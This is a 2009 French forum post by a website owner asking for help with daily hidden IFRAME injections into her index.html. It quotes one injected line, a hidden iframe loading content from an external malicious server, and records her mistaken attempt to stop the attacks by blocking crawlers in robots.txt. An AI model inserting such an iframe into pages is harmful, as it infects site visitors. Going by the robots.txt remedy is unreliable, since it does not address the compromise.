Virus found HTML/Framer : Attaques IFRAME

Bonjour,

Je suis découragée. J'ai mis mon plus récent site sur le web à la fin juin 2009 et tout allait bien. L'adresse du site est : http://www.video-ste-catherine.com

Vers le milieu du mois de juillet, mon site a commencé à subir des attaques IFRAME quotidiennement (et plusieurs fois par jour) qui faisait en sorte qu'au load de mon fichier index.html après une attaque (c'est d'ailleurs le seul fichier qui subi des attaques, aucun autre fichier HTML ne semble affecté sur mon site web), la ligne IFRAME menait à l'éxécution d'un fichier malveillant sur un serveur externe et tentait d'infecter mes clients.

Voici un exemple du genre de ligne de code qui s'auto-ajoutait à mon fichier au moment d'une attaque IFRAME :

ATTENTION! NE PAS CLIQUER SUR CE LIEN ! - - - <iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe> - - - ATTENTION! NE PAS CLIQUER SUR CE LIEN !

La seule variable est la source du lien. Les fichiers qui se loadaient automatiquement n'était pas systématiquement vénéneux mais la ligne de code était toujours ajoutée à la suite de la ligne <BODY>.

===============================================================================
Je m'arrête ici pour ce qui est de la description des attaques IFRAME, ayant fouillé quelque peu sur le net pour en savoir plus, je crois que ce ne doit pas être un concept qui vous est inconnu... Ci-dessous, ma petite histoire particulière
===============================================================================

Vers la fin du mois du juillet 2009, j'ai retiré le site internet du web de peur d'infecter mes clients avec un virus. Nous avions d'ailleurs reçu des plaintes de deux clients comme quoi leur antivirus s'était emballé à la visite du site. J'ai donc effacé toute trace du site sur le serveur. J'ai supprimé tous les fichiers.

Depuis mardi le 11 août 2009, j'ai remis le site en ligne ainsi que le fichier robots.txt. Par contre, j'ai configuré le fichier de sorte que seul Googlebot aurait accès à mon serveur. Jusqu'à aujourd'hui, 15 août, je ne subi plus qu'une seule attaque par jour. Je contiens le problème en remplaçant le fichier index.html systématiquement après chaque attaque mais le problème est toujours là. Je reste scotchée devant mon ordinateur à faire des refreshs sur ma page index.html.

Comme à l'origine du problème il y avait plusieurs attaques par jour et que mon fichier robots.txt devait autoriser tous les robots (j'en ai aucune certitude parce que c'est ce fichier est un concept tout à fait nouveau pour moi et que je ne m'étais jamais attardé ni à ce fichier, ni à son contenu auparavant) et que maintenant en ayant autorisé qu'un seul robot (Googlebot), je n'ai plus qu'une attaque par jour, je me suis dite qu'en les bloquant tous, j'en aurais plus. (?)

J'ai donc reconfiguré robots.txt :

User-agent: *
Disallow: /

Je me laisse 24 heures afin de savoir si j'ai toujours mon attaque quotidienne mais reste que mon site ne fera pas partie des résultats de recherche d'aucun moteur de recherche.

J'ai vraiment besoin d'aide et qui plus est, je commence à être vraiment coincée dans le temps puisqu'il y a une publicité imprimée qui doit paraître la semaine prochaine (semaine du 17 août 2009) et que je ne veux pas envoyer des clients potentiels sur un site qui transmet des maladies! :(

Merci de votre aide!
Cristina, la webmistress qui veut vraiment en finir avec les IFRAME

P.S. : Le support technique de WebHero.com, mon hébergeur web, ne fait pas grand-chose pour m'aider, malgré le fait que j'ai fait plusieurs fois appel à leur aide...